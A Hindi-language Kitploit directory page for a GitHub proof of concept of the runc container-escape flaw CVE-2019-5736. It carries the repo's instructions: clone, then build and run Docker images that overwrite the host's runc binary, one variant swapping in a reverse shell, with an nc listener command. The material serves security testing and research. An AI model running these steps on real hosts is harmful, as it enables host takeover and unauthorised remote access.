Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2019-5736 — CVE-2019-5736 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो runc बाइनरी अधिलेखन, exec और दुर्भावनापूर्ण इमेज पेलोड के माध्यम से कंटेनर एस्केप का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
कंटेनर सुरक्षापेलोड जनरेशनभेद्यता विश्लेषणशोषणरेड टीमिंगकंटेनर एस्केप
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

CVE-2019-5736 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो runc बाइनरी अधिलेखन, exec और दुर्भावनापूर्ण इमेज पेलोड के माध्यम से कंटेनर एस्केप का प्रदर्शन करता है।

रिपॉजिटरी देखें
16 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


वीडियो: https://bit.ly/2WqvILb

ब्लॉग पोस्ट: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

यहाँ मैं यह उल्लेख करना चाहूँगा कि इस एक्सप्लॉइट का मूल डेवलपर Twistlock Labs में Yuval Avrahami है।

POCs चलाना

ध्यान दें कि POCs चलाने से होस्ट पर runC बाइनरी ओवरराइट हो जाएगी।

यह अत्यधिक अनुशंसित है कि आप POCs में से कोई भी चलाने से पहले अपनी runC बाइनरी (सामान्यतः /usr/sbin/runc पर) की एक प्रतिलिपि बना लें।

रिपॉजिटरी क्लोन करें:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

एक सरल प्रोग्राम जो एक स्ट्रिंग प्रिंट करता है, के साथ runc को ओवरराइट करता है।

exec POC चलाना:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image POC

एक सरल रिवर्स शेल bash स्क्रिप्ट जो localhost:2345 से कनेक्ट होती है, के साथ runc को ओवरराइट करता है।

रिवर्स शेल के लिए सुनें:

root@kitploit:~
$ nc -nvlp 2345

एक अलग शेल से, malicious image POC चलाएँ:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

संदर्भ

root@kitploit:~
CVE-2019-5736 और POCs की व्याख्या के लिए [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explaining CVE-2019-5763") देखें।

Malicious image POC [q3k's POC](https://github.com/q3k/cve-2019-5736-poc) पर काफी हद तक आधारित है, इसलिए सारा श्रेय उसे जाता है।
टूल डाउनलोड करें